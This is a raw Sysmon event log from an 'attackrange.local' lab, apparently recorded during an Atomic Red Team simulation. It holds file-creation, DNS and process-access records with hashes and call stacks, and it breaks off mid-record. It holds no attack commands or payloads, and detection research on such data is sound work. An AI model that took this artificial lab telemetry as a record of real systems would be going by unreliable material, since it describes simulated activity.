C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{896A638B-B8E0-6058-1B64-190000000000}0x19641b2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000005917279Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.474{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-24 21:49:22.186 11241100x80000000000000005917278Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.473{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-24 21:49:22.185 23542300x80000000000000005917277Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:26.441{896A638B-FBAD-6058-BE11-00000000AE01}4492ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=B5FF92CDE755D2C5365C39688CDFAB71,SHA256=8A6A0406D7BD5FEDF7ABC96D75B4FCBA820EB2FDF19B1E8435E11DBB9E6E36D1,IMPHASH=00000000000000000000000000000000falsetrue 22542200x80000000000000005917276Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:23.274{896A638B-B5CB-6058-1600-00000000AE01}1308raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;C:\Windows\System32\svchost.exe 22542200x80000000000000005917275Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:22.849{00000000-0000-0000-0000-000000000000}6268raw.githubusercontent.com0::ffff:185.199.111.133;::ffff:185.199.108.133;::ffff:185.199.110.133;::ffff:185.199.109.133;<unknown process> 10341000x80000000000000005917396Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917395Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.722{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917394Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.624{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+522e9|C:\Windows\System32\SHELL32.dll+52289|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802F6E628C8)|UNKNOWN(FFFF82500B8B4A38)|UNKNOWN(FFFF82500B8AF6E5)|UNKNOWN(FFFF82500B8B0C0A)|UNKNOWN(FFFF82500B8AEEC6)|UNKNOWN(FFFFF802F6B79E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+ae824|C:\Windows\System32\SHELL32.dll+ae567|C:\Windows\System32\SHELL32.dll+ab255 10341000x80000000000000005917393Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.624{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+522e9|C:\Windows\System32\SHELL32.dll+52289|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802F6E628C8)|UNKNOWN(FFFF82500B8B4A38)|UNKNOWN(FFFF82500B8AF6E5)|UNKNOWN(FFFF82500B8B0C0A)|UNKNOWN(FFFF82500B8AEEC6)|UNKNOWN(FFFFF802F6B79E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+ae824|C:\Windows\System32\SHELL32.dll+ae567|C:\Windows\System32\SHELL32.dll+ab255 10341000x80000000000000005917392Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+522e9|C:\Windows\System32\SHELL32.dll+52289|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802F6E628C8)|UNKNOWN(FFFF82500B8B4A38)|UNKNOWN(FFFF82500B8AF6E5)|UNKNOWN(FFFF82500B8B0C0A)|UNKNOWN(FFFF82500B8AEEC6)|UNKNOWN(FFFFF802F6B79E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+ae824|C:\Windows\System32\SHELL32.dll+ae567|C:\Windows\System32\SHELL32.dll+ab255 10341000x80000000000000005917391Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+accef|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917390Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+acc5a|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917389Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+acc36|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638432Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:27.945{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA672337514C02DED9A36DEBB373C2E1,SHA256=533D6D57FC0DB92E19B6C0D62FB5F25BD35DFFD46EA73C71947B023B6CD3DA4B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917388Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+acc36|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917387Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+accef|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917386Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+acc5a|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917385Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+acc36|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917384Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+acc36|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917383Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.623{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b2413|C:\Windows\System32\SHELL32.dll+acf77|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917382Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.622{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+accef|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917381Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.622{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+acc5a|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917380Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.622{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+acc36|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917379Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.622{896A638B-B8E2-6058-B102-00000000AE01}42445764C:\Windows\Explorer.EXE{896A638B-B979-6058-2004-00000000AE01}6812C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+acc36|C:\Windows\System32\SHELL32.dll+ae5e8|C:\Windows\System32\SHELL32.dll+ab255|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+af04a|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917378Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.552{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B615637BC73857DD7783AD545E325593,SHA256=E23D5BD3F5C0144241791717EDD488EFF79E205E00181CD8C66E19BB3E92945D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917377Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.517{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09A03CDA492250964FBD6864EA0C183D,SHA256=21729E53C295B263E4E685B9BB85362BE75496B50C5589C516BDF6AE5BDCAB95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917376Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.513{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CAE29A64E758819F3445573614F068B1,SHA256=855D94ED054880301CE1F677792D6A135EEDE4FF3D2635147FE5401EFA50941C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917375Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.382{896A638B-FBAD-6058-BE11-00000000AE01}4492ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\2\art-out.txtMD5=344A87323ABF45AA3F24C69E65535EC5,SHA256=7286FEB7927171DDC7DFEE080240E7639FAABE08388B0689FE8118D6ACA98D2E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917374Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.308{896A638B-FBAD-6058-BF11-00000000AE01}10032C:\Windows\system32\conhost.exe{896A638B-B3E7-605B-7669-00000000AE01}6356C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917373Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.306{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917372Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.306{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917371Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:27.306{896A638B-B5CA-6058-0C00-00000000AE01}8244284C:\Windows\system32\svchost.exe{896A638B-B5DB-6058-2C00-00000000AE01}2172C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917370Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 